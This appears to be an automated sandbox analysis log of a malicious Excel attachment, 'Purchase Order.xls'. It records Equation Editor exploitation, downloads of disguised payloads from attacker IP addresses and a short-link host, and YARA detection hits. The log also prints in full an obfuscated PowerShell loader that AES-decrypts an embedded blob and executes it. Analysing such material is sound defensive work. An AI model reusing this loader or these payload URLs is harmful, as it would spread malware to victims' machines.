    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.11:80
    Source: seethemoononlinetoseebeautygirl[1].gif.8.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
    Source: seethemoononlinetoseebeautygirl[1].gif.8.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
    Source: seethemoononlinetoseebeautygir.vBS.8.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
    Source: seethemoononlinetoseebeautygir.vBS.8.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 198.46.176.133 198.46.176.133
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: GET /EvwK HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /46/NO/seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /46/seethemoononlinetoseebeautygirl.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B3BC04F.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /EvwK HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /46/NO/seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /46/seethemoononlinetoseebeautygirl.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: tny.wtf
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 Jul 2024 16:27:57 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6H%2FP2NlJPhXa%2FTfkSn%2Fda9seyrk0LmCKJOczhDBcX8CQrET%2Bkh3c5UczxPchQ24HvmGVJ%2FLfz%2Bt2IwQ1qihCZVff2EtryHkmxwV6auXfZaWSRvoRNRsjfhzi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ab6b814699f4251-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 Jul 2024 16:27:58 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tehz8SfY8mylTRAjp56R8TwlRJImz4cHY5TZyh%2FnQKkWbDCyMvDdMvY%2FhhlBdgC6idCcValRmERt46OlcKJQSoSOTCiFcQF6KEAHMmaHzNsVfbo6UO9runoY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ab6b8187f884251-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 Jul 2024 16:27:58 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0oazHEPaOKH3HpKMAmJKZpOMW%2FpTzxJZR1Ep76vqFfJitfHjfS8%2FQxN8M9kPa1PokD9L4uqIGCMB3SMr4t9BnzNlr8QnnYtGaD8hyieRHiWL4Zf2%2FGyvTYGp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ab6b819a8d24251-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
    Source: EQNEDT32.EXE, 00000008.00000002.440000620.000000000058F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF
    Source: EQNEDT32.EXE, 00000008.00000002.440000620.000000000058F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFj
    Source: EQNEDT32.EXE, 00000008.00000002.440000620.000000000058F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFt
    Source: powershell.exe, 0000000A.00000002.538405336.000000000224A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
    Source: powershell.exe, 0000000A.00000002.538405336.000000000224A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.538202991.0000000000020000.00000004.00000020.00040000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
    Source: powershell.exe, 0000000A.00000002.538405336.0000000002408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000A.00000002.538405336.0000000002111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: tny.wtf.url.4.drString found in binary or memory: http://tny.wtf/
    Source: EvwK.url.4.drString found in binary or memory: http://tny.wtf/EvwK
    Source: Purchase Order.xlsString found in binary or memory: http://tny.wtf/EvwKS
    Source: ~DF2F0C708EE11275F5.TMP.0.dr, 4E630000.0.drString found in binary or memory: http://tny.wtf/EvwKyX
    Source: powershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 0000000A.00000002.539010915.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    barindex
    Source: Process Memory Space: powershell.exe PID: 3332, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC991353.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Source: Purchase Order.xlsOLE: Microsoft Excel 2007+
    Source: ~DF5E0D49EEB1332A8C.TMP.0.drOLE: Microsoft Excel 2007+
    Source: 4E630000.0.drOLE: Microsoft Excel 2007+
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\EvwK.urlJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.urlJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0058FF1E8_2_0058FF1E
    Source: Purchase Order.xlsOLE indicator, VBA macros: true
    Source: Purchase Order.xlsStream path 'MBD000C7DEB/\x1Ole' : http://tny.wtf/EvwKSTy>Rw1&$.P[(o-!{v2w"Bhe#-1Ry-i%6xl=HHiah,4.cD:%F&DRWK\d?6g)1|[-P<DCx4&Ac[$puN;8e-tTIf(CKLw8SnGLE78dfEYbYZ9uyDw54bwNcDvU0rpHuBCByzZ1SJpKs8y2jIYAO65iRZvHud3NSrzfYmzKLZerOsgKXNT4EoeQ6Dg0jANNE9k483KIGHuHULnCMxv2nhzHp9l1W7uOzjpE0E0jj9nPw9AZr2ytSkcFbqUXd6HqDu16Ztkj4dyofvzTEBZEk1YZtLLYKlTVyWR4OUrm~\ysi]"#ldyr
    Source: ~DF5E0D49EEB1332A8C.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~WRF{8FE04F55-A836-48BD-93EE-A3A590DB0015}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: Process Memory Space: powershell.exe PID: 3332, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC991353.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: classification engineClassification label: mal100.expl.evad.winXLS@7/34@6/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\4E630000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA340.tmpJump to behavior
    Source: Purchase Order.xlsOLE indicator, Workbook stream: true
    Source: 4E630000.0.drOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T.......qJ..............................................T..........s............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T.......}J......................................................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................F.a.i.l.e.d. .T.o. .d.o.w.n.l.o.a.d. .d.a.t.a. .f.r.o.m. .$.l.i.n.k.....................D.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<...............................n.k.............................................Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Purchase Order.xlsReversingLabs: Detection: 28%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
